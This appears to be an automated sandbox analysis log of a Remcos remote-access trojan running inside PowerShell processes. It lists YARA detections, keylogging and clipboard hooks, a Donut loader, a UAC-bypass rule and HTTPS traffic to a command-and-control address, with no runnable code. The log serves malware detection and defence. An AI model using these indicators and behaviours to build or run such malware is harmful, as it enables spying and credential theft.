                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49734 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0041183A OpenClipboard,GetLastError,DeleteFileW,13_2_0041183A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: powershell.exeProcess created: 42
                Source: cmd.exeProcess created: 48

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.3558882823.0000000005A1C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1664350212.000000000984B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1930013571.0000000006091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1932265209.0000000006131000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1666563849.000000000A3D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000031.00000002.2611623646.0000000005C4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000001B.00000002.1976587463.000000000A541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000050.00000002.4176174475.00000000055DE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.3519219272.000000000597C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2239205630.000000000632B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1672116393.000000000A836000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000022.00000002.2082788404.00000000064CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004B.00000002.3963998380.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2235153189.000000000628A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004B.00000002.4003774711.0000000005AED000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3324693683.00000000060BB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1789068655.00000000054C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000050.00000002.4142249719.000000000553E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000037.00000002.2811950232.0000000005BFC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000037.00000002.2798234763.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003C.00000002.3020737620.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000003C.00000002.3354412418.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000031.00000002.2605482729.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000046.00000002.4173144196.000000000888C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1822042034.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000022.00000002.2085983779.000000000656F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3295240918.000000000601B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000016.00000002.1790510884.0000000005560000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044B04013_2_0044B040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0043610D13_2_0043610D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044731013_2_00447310
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044A49013_2_0044A490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040755A13_2_0040755A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0043C56013_2_0043C560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044B61013_2_0044B610
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044D6C013_2_0044D6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004476F013_2_004476F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044B87013_2_0044B870
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044081D13_2_0044081D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0041495713_2_00414957
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004079EE13_2_004079EE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00407AEB13_2_00407AEB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044AA8013_2_0044AA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00412AA913_2_00412AA9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00404B7413_2_00404B74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00404B0313_2_00404B03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044BBD813_2_0044BBD8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00404BE513_2_00404BE5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00404C7613_2_00404C76
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00415CFE13_2_00415CFE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00416D7213_2_00416D72
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00446D3013_2_00446D30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00446D8B13_2_00446D8B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00406E8F13_2_00406E8F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040503815_2_00405038
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041208C15_2_0041208C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004050A915_2_004050A9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040511A15_2_0040511A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043C13A15_2_0043C13A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004051AB15_2_004051AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044930015_2_00449300
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040D32215_2_0040D322
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A4F015_2_0044A4F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041363115_2_00413631
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044669015_2_00446690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A73015_2_0044A730
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004398D815_2_004398D8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004498E015_2_004498E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044A88615_2_0044A886
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0043DA0915_2_0043DA09
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00438D5E15_2_00438D5E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00449ED015_2_00449ED0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0041FE8315_2_0041FE83
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00430F5415_2_00430F54
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00444B5A appears 37 times
